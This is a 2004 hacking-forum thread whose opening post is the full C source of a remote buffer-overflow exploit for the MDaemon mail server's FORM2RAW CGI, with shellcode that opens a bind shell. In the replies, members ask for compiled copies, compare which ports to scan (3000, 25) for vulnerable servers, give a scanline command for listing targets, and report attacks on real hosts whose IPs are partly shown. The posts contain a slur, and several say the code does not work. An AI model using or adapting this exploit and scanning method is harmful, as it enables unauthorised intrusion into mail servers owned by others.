Remote Exploit For Mdaemon Mail Server

stonebreaker

Mar 16 2004, 07:18 AM

CODE

/*

Copyright ?Rosiello Security

http://www.rosiello.org

================

<rave> ____________
<rave> _.-----------------------/ `-,,
<rave> ,' ; ; / `-._
<rave>; ; ; .') \ `\
<rave> `--------------------.'.' _.-'`- . `\
<rave> ;`---'-------.\, `\ _
<rave> ;, ; .---`, ` -
<rave> ;` ; `.____;
<rave> `--------------'_ ,,
<rave> ,; ; .---`, ` ._
<rave> ;; ; `.____; ___``````
<rave> `;--------------' `
<rave> ,; ; .---`,
<rave> ;; ; `.____;
<rave> `.------------'
<rave> ``----...__ _..=
<rave> `````---=-.---``'`
_
| |_
|_ _|
|_|

/\ \ We /\ \ are /\ \
/::\ \ Black /::\ \ H@t \:\ \
/:/\:\ \ /:/\:\ \ \:\ \
_::\~\:\ \ _::\~\:\ \ /::\ \
/\ \:\ \:\__\ /\ \:\ \:\__\ /:/\:\__\
\:\ \:\ \/__/ \:\ \:\ \/__/ /:/ \/__/
\:\ \:\__\ \:\ \:\__\ /:/ /
\:\/:/ / \:\/:/ / /:/ /
\::/ / \::/ / /:/ /
\/__/ \/__/ \/__/ airsupply@0x557.org
http://www.0x557.org
================

--== Remote Exploit for Mdaemon version v6.85 and prior to 6.52 ==--
Code by: rave
Contact: rave@rosiello.org
Contact: airsupply@0x557.org
Date: March 2004

Bug found by: hat-squad security ( great job !! )

MDaemon offers a full range of mail server functionality. MDaemon protects your users from
spam and viruses, provides full security, includes seamless web access to your email via
WorldClient, remote administration, and much more!".FORM2RAW.exe is a CGI that allows users
to send emails using the MDaemon via a web page. It processes the fields of an HTML form and
creates a raw message file in the raw queue directory of MDaemon mail server. This file then
will be processed and queued for delivery by MDaemon. An attacker can cause a buffer overflow
in MDaemon by issuing a malformed CGI request to FORM2RAW.exe.

According to the Help file "By default, MDaemon 6.52 or higher will not send emails created by
Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the
MDaemon server. If you want to disable this behavior you can set the FromCheck=No in FORM2RAW.INI
file".

Sending more than 153 bytes in the "From" field to FROM2Raw.exe creates a raw file that when processed
by MDaemon will cause a Stack buffer overflow. The EIP register will be overwritten when the From field
length is 249 bytes

Do i need to say more ? this is 0wnage 0ldsch00l style have fun..
This spawns a waiting bindshell on the victims computer at port 58821..

ps:
The exploit has only been tested on Windows XP Home and pro edition (dutch) sp1 + the stack
has been proofen to be verry humpy. So please dont yell it me if the exploit doesn't work on your
Operative System .. thanks

The demo mode of the exploit shows in the debugger the following
EAX = 00000000 EBX = 00000000 ECX = 014D1BD8 EDX = 01090000 ESI = 014C6000 EDI = 01AEF1A8
EIP = 42424242 ESP = 01AEEEE8 EBP = 0005E668

Note:Demo mode works on all operative systems

Usage <C:\Mdeamon>Mdeamon_exp.exe <target host> <target number>
Target Number Target Name Stack Adress
============= =========== ===========
0 Demo 0x42424242
1 Windows XP HOME [NL] 0x014D4DFC
2 Windows XP PRO [NL] 0x014D4DFC

<C:\Mdeamon> Mdeamon_exp localhost 1
[+] Winsock Inalized
[+] Trying to connect to localhost:3000
[+] socket inalized
[+] Overflowing string is Prepared
[+] Connected
[+] Overflowing string had been send

<C:\> telnet localhost 58821
Microsoft Windows XP [versie 5.1.2600]
C) Copyright 1985-2001 Microsoft Corp.

D:\MDaemon\APP>

Special Thanks to:
airsuppy { 0x557 security r0cked me, ty for u part and cooperationg bro }
Silicon { Unofficial source`s told me ur a rosiello member good i lent ur bindcode TY 100% }
Sam { once again 0x557 ty for the chat aldo it was a short one }
Dragnet { Always willing to help me out }
Angelo { Verry verry good friend }
Punix { Last time i forgot you girl ! :( im so sorry }

Greetz go out to:
NrAziz { This is my brother anyone who touches him touches me, so pls make my day ! }
sloth { good guy }
Mercy { Hope to see u soon }
Netric security { www.netric.org/.be }
0x557 security (SST) { www.0x557.org }
[+] All the hax0rs i forgot.

This was rosiello there first coorperation with the 0x557 ppl witch have been proofen to be
realy nice, in the past rosiello has worked with (now death) DSR also known as dtors
security research, but (and its a personal wish) hope that 0x557 still will be so nice for
us. I feel my self called to give a great big shoutout to these ppl for there work for now and
in the futhure !! keep on doing the great job !.

Bad sounds of these days {
i cant remember anything , can`t tell of this is trough or a dream. deep down down inside me i ,
feel the stream this terrable silence stop with me. Now that the warn is trough with me im waking
up i can not see that there is nothing left of me nothing is real but pain now.

}

The original advisory can be found at: http://hat-squad.com/bugreport/mdaemon-raw.txt
The mirored advisory can be fount at: http://www.securiteam.com/windowsntfocus/5ZP050ABPY.htm
Our own Advisory can be found at : http://www.rosiello.org/en/read_bugs.php?17

!!!DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!!
Respect the law as we do!

I'm outa here bye bye !
*/

#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

// Darn (filtered) 1337 macro shit
#define ISIP(m) (!(inet_addr(m) ==-1))

#define offset 267 //;267 //1024

// hmm :D
#define NOPS "\x90\x90\x90\x90\x90\x90\x90"

struct sh_fix
{
unsigned long _wsasock;
unsigned long _bind;
unsigned long _listen;
unsigned long _accept;
unsigned long _stdhandle;
unsigned long _system;
};

struct remote_targets {
char *os;
unsigned long sh_addr;
struct sh_fix _sh_fix;
} target [] ={
/* Option`s for your eyes only :D*/
"Demo ",
0x42424242,
{ 0x90909090,
0x90909090,
0x90909090,
0x90909090,
0x90909090,// <--
0x90909090,
},

"Windows XP HOME [NL]",
0x014D4DFC,
{ 0x71a35a01,
0x71a33ece,
0x71a35de2,
0x71a3868d,
0x77e6191d,// <--
0x77bf8044,
},

"Windows XP PRO [NL]",
0x014D4DFC,
{ 0x71a35a01,
0x71a33ece,
0x71a35de2,
0x71a3868d,
0x77e6191d,// <--
0x77bf8044,
}
};

unsigned char _addy [] =
"\x90\x90\x90\x90";

// 116 bytes bindcode for windows,(NTlike) port=58821, by silicon :)
// w000w you rule !!
unsigned char shellcode[] =

"\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
"\x6A\x01\x6A\x02\xB8"
"\xAA\xAA\xAA\xAA"
"\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
"\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
"\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
"\xBB\xBB\xBB\xBB"
"\xFF\xD0\x6A\x01\x53\xB8"
"\xCC\xCC\xCC\xCC"
"\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
"\xDD\xDD\xDD\xDD"
"\xFF\xD0\x8B\xD8\xBA"
"\xEE\xEE\xEE\xEE"
"\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
"\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
"\x6D\x64\x8D\x45\xFC\x50\xB8"
"\xFF\xFF\xFF\xFF"
"\xFF\xD0\x41";

/* The funny thing is while exploiting this bug one of the adresses
(see target[1 || 2].sh_addr) had a forbidden character (0x20 aka space) to fix this i wrote
this addy/mini shellcode tho replace the 0x19 (thats not supposed to be there) in the
SetStdHandle () adress inside the shellcode for an 0x20.
*/

unsigned char _me [] =
"\x33\xC9" // xor ecx,ecx
"\xBE\xAA\xAA\xAA\xAA" // mov esi,offset _shellcode (00421a50)
"\x83\xC1\x1F" // add ecx,1Fh
"\x41" // inc ecx
"\x66\x89\x4E\x50" // mov word ptr [esi+50h],cx
"\xC6\x46\x51\xE6"; // mov byte ptr [esi+51h],0E6h

// now what would this button do ?
char *host_ip;
u_long get_ip(char *hostname)
{
struct hostent *hp;

if (ISIP(hostname)) return inet_addr(hostname);

if ((hp = gethostbyname(hostname))==NULL)
{ perror ("[+] gethostbyname() failed check the existance of the host.\n");
exit(-1); }

return (inet_ntoa(*((struct in_addr *)hp->h_addr)));
}

int fix_shellcode ( int choise )
{
unsigned long only_xp =target[choise].sh_addr+strlen(NOPS)+strlen(_me);

memcpy(_me+3,((char *)&only_xp),4);

//0xf offset to the adres of WSASocketA
memcpy(shellcode+0xf,((char *)&target[choise]._sh_fix._wsasock),4);

//0x30 offset to the adres of bind
memcpy(shellcode+0x30,((char *)&target[choise]._sh_fix._bind),4);

//0x3a offset to the adres of listen
memcpy(shellcode+0x3a,((char *)&target[choise]._sh_fix._listen),4);

//0x46 offset to the adres of _accept
memcpy(shellcode+0x46,((char *)&target[choise]._sh_fix._accept),4);

//0x4f offset to the adres of SetStdHandle
memcpy(shellcode+0x4f,((char *)&target[choise]._sh_fix._stdhandle),4);

//0x6e offset to the adres of SYSTEM
memcpy(shellcode+0x6e,((char *)&target[choise]._sh_fix._system),4);

return 0;

}
/// oooh yeah uuuh right .... Crap dont you uuh yeah at me you know me !
int usage (char *what)
{
int i;

fprintf(stdout,"Copyright ?Rosiello Security\n");
fprintf(stdout,"http://www.rosiello.org\n\n");
fprintf(stdout,"Usage %s <target host> <target number>\n",what);
fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n");
fprintf(stdout,"=============\t\t===========\t\t\t\t===========\n");

for (i=0;i < 3;i++)
fprintf(stdout,"%d\t\t\t%s\t\t0x%p\n",i,target[i].os,target[i].sh_addr);

exit(0);
}

int main(int argc,char **argv)

{

char buffer[offset*4]="get /form2raw.cgi?From=",*ptr,*address;
int sd,oops,i,choise;
struct sockaddr_in ooh;

WSADATA wsadata;
WSAStartup(0x101, &wsadata);

if (argc < 2) usage(argv[0]);
address=argv[1];
choise=atoi(argv[2]);
fix_shellcode(choise);

fprintf(stdout,"[+] Winsock Inalized\n");

/* Lets start making a litle setup
Change the port if you have to */

ooh.sin_addr.s_addr = inet_addr(get_ip(address));
ooh.sin_port = htons(3000);
ooh.sin_family = AF_INET;

fprintf(stdout,"[+] Trying to connect to %s:%d\n",address,3000);

// ok ok here`s ur sock()
sd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);
if (!sd<0) { fprintf(stderr,"[!] socket() failed.\n");exit (-1); }

fprintf(stdout,"[+] socket inalized\n");

/* inalizing the expploiting buffer read the file comments for the details */
ptr=buffer+strlen(buffer);

for (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x40;

sprintf(buffer+strlen(buffer),"%s%s&To=airsupply@0x557.org&Subject=hi&Body=%s%s%s HTTP/1.0\r\n\r\n",
((char *)&target[choise].sh_addr),_addy,NOPS,_me,shellcode);

//memcpy(buffer+35,shellcode,strlen(shellcode));

fprintf(stdout,"[+] Overflowing string is Prepared\n");

// Knock knock ... hi i want to hook up with you
oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));
if(oops!=0) { fprintf(stderr,"[!] connect() failed.\n"); exit(-1); }

// yep wher`e in :D
fprintf(stdout,"[+] Connected\n");

// Sending some Dangerous stuff
i = send(sd,buffer,strlen(buffer),0);
if (!i <0) { fprintf (stdout,"[!] Send() failed\n"); exit (-1); }

fprintf(stdout,"[+] Overflowing string had been send\n");

// Bring in the cleaners !!
WSACleanup();

// [EOF]
return 0;

}

it looks like you can get a shell
but i can not compile it with lcc .
anyone compile it succeed please publish it thx

R0x0r

Mar 16 2004, 07:38 AM

No luck here. Why can't we compile? Hmmmm. Would be nice having the compiled version.

Nexcess

Mar 16 2004, 07:49 AM

way to repeat my post heh...

hxxp://www.governmentsecurity.org/forum/http://www.governmentsecurity.org/forum/index.php?showtopic=7298

stonebreaker

Mar 16 2004, 08:08 AM

oh sorry i have not seen that you had post it
hehe
but have you compiled it succeed ?

som3aa

Mar 16 2004, 10:58 AM

QUOTE (stonebreaker @ Mar 16 2004, 08:08 AM)

oh sorry i have not seen that you had post it
hehe
but have you compiled it succeed ?

No he failed that's what his post was about
but thewatcher managed to compile it , it's find in beginner's section.
he made an autohaxor and added dmaeon.

go there download the it and get started

bware of the bitch when u run the program hehe

fre4k

Mar 16 2004, 11:44 AM

Anybody has a shell with this remote exoloit ?

edit:

I`ve got this

C:\>nc.exe -vv 198.163.*.* 58821
gateway.coleandpartners.onramp.ca [198.163.180.194] 58821 (?) open#
_

But no shell ...

morbido

Mar 16 2004, 01:49 PM

could anyone compile this exploit ???
post it here plzZz

stonebreaker

Mar 16 2004, 02:52 PM

i think the autohack some have post is only to crash the daemon
and this i post can get a shell

rvd

Mar 16 2004, 03:23 PM

The autohacker did not work on my local network and not on local pc, still havent been able to compile the code above

z3r0

Mar 16 2004, 07:26 PM

Compiled version posted here:
http://www.governmentsecurity.org/forum/in...e=post&id=55822

IIzedII

Mar 16 2004, 07:43 PM

hmm guys for which port you have to scan for daemon?
sry for my english - im just a german faget .P

Trackmaster

Mar 16 2004, 07:47 PM

im thinking port 25 - but i may be wrong ?

IIzedII

Mar 16 2004, 07:54 PM

QUOTE (Trackmaster @ Mar 16 2004, 07:47 PM)

and thats faggot m8 not fagget

first i said faget and not fagget
and second you can say faget or faggot - for example JD sais "faget"

but thats another thing...
hmm port 25 - there you will find a lot of mail server ^^ but not only with mdaemon..
do you guys think mdaemon is a often use prog?

icu2l8

Mar 16 2004, 08:06 PM

You scan for port 389 (>scan.txt) and check using scanline on port 25
sl.exe -bhpt 25 -f scan.txt -o vulnerable.txt
for the mdaemon mailer....
The same as imail exploit scaning

DHS

Mar 16 2004, 08:09 PM

I think 3000 is the port to scan. Thats where the web interface listens on.

http://www.securitytracker.com/alerts/2003/Dec/1008572.html

Not sure if i have the same exploit here... but it came out as first on google and has the same vulernable versions.

And if it is another exploit, it still might be a good reason to scan on port 3000 becouse the web interface is installed by default, so most of the mdaemon servers will have that port open

GreetZ

brOmstar

Mar 16 2004, 08:09 PM

port 3000 not 389 what ur talking about read the source btw its only for XP NL ..u have to change the offsets if i'm not wrong

usch

Mar 16 2004, 08:09 PM

think it's 3000 isn`t it ???

regards

edit:oh it`s been posted before, didn`t notice it.sorry

icu2l8

Mar 16 2004, 08:22 PM

Checked what DHS just have said...
and yes... port 3000 works also

But you have to check on port 25 that this is MDAEMON and
what is the version of MDAEMON

XpProf

Mar 16 2004, 08:27 PM

QUOTE (icu2l8 @ Mar 16 2004, 08:22 PM)

Checked what DHS just have said...
and yes... port 3000 works also

But you have to check on port 25 that this is MDAEMON

I think that few server use mdaemon...

Xp

icu2l8

Mar 16 2004, 08:29 PM

After checking 10 servers, don't c that any of the exploits realy works

z3r0

Mar 16 2004, 08:31 PM

Shouldn't we go to the chat room ppl?

icu2l8

Mar 16 2004, 08:33 PM

Go to the chat room

(where is it anyhow ?)
We stay here...
I hope someone will show a proof today for this exploit

icu2l8

Mar 16 2004, 08:39 PM

Will someone tell me why all the time ...

[+] Winsock Inalized
[+] Trying to connect to 216.41.x.x:3000
[+] socket inalized
[+] Overflowing string is Prepared
[!] connect() failed.

connect failed ?

z3r0

Mar 16 2004, 08:40 PM

under the banner...members,calendar...

eclipze

Mar 16 2004, 08:48 PM

QUOTE (icu2l8 @ Mar 16 2004, 08:39 PM)

Will someone tell me why all the time ...

[+] Winsock Inalized
[+] Trying to connect to 216.41.x.x:3000
[+] socket inalized
[+] Overflowing string is Prepared
[!] connect() failed.

connect failed ?

yes im also getting this, i tried about 50 servers with mdaemon v6.85
maybe the compiled exploit isnt right?

XpProf

Mar 16 2004, 08:50 PM

QUOTE (icu2l8 @ Mar 16 2004, 08:39 PM)

Will someone tell me why all the time ...

[+] Winsock Inalized
[+] Trying to connect to 216.41.x.x:3000
[+] socket inalized
[+] Overflowing string is Prepared
[!] connect() failed.

connect failed ?

I get the same error...

icu2l8

Mar 16 2004, 08:52 PM

Will someone change the language of the exploit to english...
Maybe then it will work better

SkitZZ

Mar 16 2004, 10:08 PM

dont know why you peeps dont just read through the code

CODE

The exploit has only been tested on Windows XP Home and pro edition (dutch) sp1 + the stack
has been proofen to be verry humpy. So please dont yell it me if the exploit doesn't work on your
Operative System .. thanks

CODE

C:\Mdeamon> Mdeamon_exp localhost 1
[+] Winsock Inalized
[+] Trying to connect to localhost : 3000
[+] socket inalized
[+] Overflowing string is Prepared
[+] Connected
[+] Overflowing string had been send

next time look through the code before you start spamming and you ruin the the thread for others

SkitZZ

eclipze

Mar 16 2004, 10:16 PM

it says:

CODE

[!] connect() failed.

ofcourse i read the code, i tried at dutch hosts.
i don't think "connect() failed." has anything to do with connecting to a ducht server or not...

but how come you can connect..? weird this..

som3aa

Mar 17 2004, 12:24 AM

Guys for me it connects and sends exploit.

but i sc@nned a huge no. and got nothing

-Arthy-

Mar 17 2004, 12:38 AM

Haven't tried it yet, but now I will

I'll post my experience here too
Don't think I will get any results if I read al the posts above anyways...
I got XP SP1 (dutch)

Peace out...

DaClueless

Mar 17 2004, 03:03 AM

Tested Locally on VMware versions of OS:

Eng Win 2000 SP3 - DOS
Eng Win 2000 SP4 - DOS
Eng XP SP0 - DOS
Eng XP SP1 - DOS

so no, luck finding an Working exploit.

Frippo

Mar 17 2004, 07:00 AM

I havent been able to get any shell yet either..

TheOther

Mar 17 2004, 09:32 AM

I've tested it also on a dutch XP SP1. No luck, keeps telling me he couldn't connect.
I've tried to exploit this local but he couldn't connect.
I think there is something wrong with this code. What do you guys think?

mysoulmustfly

Mar 17 2004, 01:48 PM

Bug found by: hat-squad security ( great job !! )

thx from iranian security Group

hat-squad.com

Damned_Vampire

Mar 18 2004, 01:59 AM

you have to take the getip function from the source code
then it won´t give a connect() failed error and it will work

make2004

Mar 18 2004, 06:40 AM

QUOTE (IIzedII @ Mar 16 2004, 07:43 PM)

hmm guys for which port you have to scan for daemon?
sry for my english - im just a german faget .P

Thanks .I See

mysoulmustfly

Mar 18 2004, 10:13 AM

i use NC and tell nc to listen on port 3000 UDP nad TCP
but nothing happend
is it a VIRUS ?

TheOther

Mar 18 2004, 04:01 PM

Maybe you could share your code with us, Damned_Vampire?

Black_hat

Mar 20 2004, 09:57 AM

Hello
This exploit working on XP box ... And our exploit just Send the BufferOverflow command tho mdaemon server we dont publish THe another exploit in public site (exploit bind with shell) . We'll publish new Vulnerability in this week

Black_Hat
--------------
Member oF Hat-Squad Security Research Team

redcorp

Mar 21 2004, 06:10 AM

can someone post a proper version thats not screwed up

wizy

Mar 21 2004, 11:35 AM

anyone have a working copy of this yet? one with a shell?